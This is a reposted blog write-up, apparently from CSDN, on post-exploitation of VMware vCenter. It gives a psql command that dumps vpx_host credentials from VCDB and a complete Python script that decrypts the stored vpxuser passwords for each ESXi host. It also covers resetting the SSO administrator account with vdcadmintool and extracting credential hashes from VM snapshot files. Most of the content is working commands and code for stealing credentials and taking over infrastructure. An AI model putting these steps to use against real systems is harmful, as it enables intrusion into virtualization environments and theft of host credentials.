PGPASSWORD='<psql password>' ./psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;"

Copy the password column into a file named password.enc (one value per line)

4. Decrypt with the script

GitHub - shmilylty/vhost_password_decrypt: vhost password decrypt

  • symkey.dat is the decryption key obtained in step 2
python decrypt.py symkey.dat password.enc password.txt

The script writes password.txt, which holds the decrypted password for each ip_address: these are the vpxuser credentials vCenter uses to manage each ESXi host

My output here was empty

5. Use the passwords from password.txt to log in to the corresponding ESXi hosts (vpxuser is an account on the ESXi host, not a vCenter SSO account)
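As an added example (not the referenced decrypt.py), the script below walks the whole of steps 2 to 4: it loads the key from symkey.dat, picks the password column out of the psql table output, and decrypts each value. It assumes the layout that decrypt.py handles as far as this example's author knows it: symkey.dat holds the AES key hex-encoded, and each stored password is "*" followed by base64(IV || AES-CBC ciphertext) with PKCS#7 padding; check those assumptions against decrypt.py before relying on the output. The key and psql output are constructed placeholders, and the AES step needs pycryptodome.

```python
"""Decrypt vpx_host.password values with the key from symkey.dat.

Example added to this write-up; it is not the referenced decrypt.py. Assumed format:
symkey.dat = hex-encoded AES key; each password = '*' + base64(IV || AES-CBC ciphertext)
with PKCS#7 padding. Verify against decrypt.py before relying on the output."""
import base64
import re

# Constructed placeholder: a real symkey.dat is 64 hex characters (a 32-byte AES-256 key)
SAMPLE_SYMKEY = "00" * 32


def _blob(raw):
    return "*" + base64.b64encode(raw).decode()


# Constructed psql output for: select ip_address,user_name,password from vpx_host;
SAMPLE_PSQL_OUTPUT = (
    "  ip_address  | user_name |  password\n"
    "--------------+-----------+-----------\n"
    " 192.0.2.10   | vpxuser   | %s\n"
    " 192.0.2.11   | vpxuser   | %s\n"
    "(2 rows)\n" % (_blob(bytes(32)), _blob(bytes(48)))
)


def load_symkey(text):
    """symkey.dat -> raw AES key (assumed hex encoding; surrounding whitespace tolerated)."""
    key = bytes.fromhex(re.sub(r"\s+", "", text))
    if len(key) not in (16, 24, 32):
        raise ValueError("symkey.dat decoded to %d bytes, not an AES key" % len(key))
    return key


def split_blob(enc):
    """'*<base64>' -> (iv, ciphertext); rejects blobs that are not IV plus whole AES blocks."""
    enc = enc.strip()
    if enc.startswith("*"):
        enc = enc[1:]
    raw = base64.b64decode(enc)
    if len(raw) < 32 or len(raw) % 16:
        raise ValueError("blob is not IV + whole AES blocks (%d bytes)" % len(raw))
    return raw[:16], raw[16:]


def pkcs7_unpad(data):
    """Strip PKCS#7 padding; a bad pad usually means the wrong key or a different format."""
    n = data[-1] if data else 0
    if not 1 <= n <= 16 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding")
    return data[:-n]


def decrypt_password(key, enc):
    """AES-CBC decrypt one vpx_host.password value (needs pycryptodome)."""
    from Crypto.Cipher import AES  # pip install pycryptodome
    iv, ct = split_blob(enc)
    return pkcs7_unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(ct)).decode("utf-8", "replace")


def parse_psql_rows(text):
    """Pick the data rows out of psql's table output (header, separator and footer are skipped)."""
    rows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.split("|")]
        if len(cells) == 3 and cells[2].startswith("*"):
            rows.append({"ip_address": cells[0], "user_name": cells[1], "password": cells[2]})
    return rows


def decrypt_all(key, psql_text):
    """(ip, user, plaintext-or-error) for every host row; one bad row does not stop the rest."""
    out = []
    for row in parse_psql_rows(psql_text):
        try:
            pw = decrypt_password(key, row["password"])
        except Exception as e:  # missing pycryptodome, bad base64, bad padding, ...
            pw = "<decrypt failed: %s>" % e
        out.append((row["ip_address"], row["user_name"], pw))
    return out


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:
        sys.exit("usage: %s symkey.dat vpx_host.txt  (vpx_host.txt = saved psql output)" % sys.argv[0])
    with open(sys.argv[1]) as kf, open(sys.argv[2]) as pf:
        for ip, user, pw in decrypt_all(load_symkey(kf.read()), pf.read()):
            print("%s\t%s\t%s" % (ip, user, pw))
```

Keeping the IP address next to each decrypted value matters in practice: vCenter stores one vpxuser password per managed host, so a password is only useful against the host it was recorded for.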

Resetting the password

The quickest method, but the original password cannot be recovered afterwards and the administrator will notice the change

#Linux 
/usr/lib/vmware-vmdir/bin/vdcadmintool 

#Windows 
C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exe

Choose option 3 and enter the default account administrator@vsphere.local (requires administrator privileges). This failed for me as well.

Taking over virtual machines

Once logged in to the web console, to take over a particular virtual machine: select the target VM, take a snapshot, locate the snapshot files, and extract the credential hashes from them.


Reposted from blog.csdn.net/qq_44159028/article/details/131898608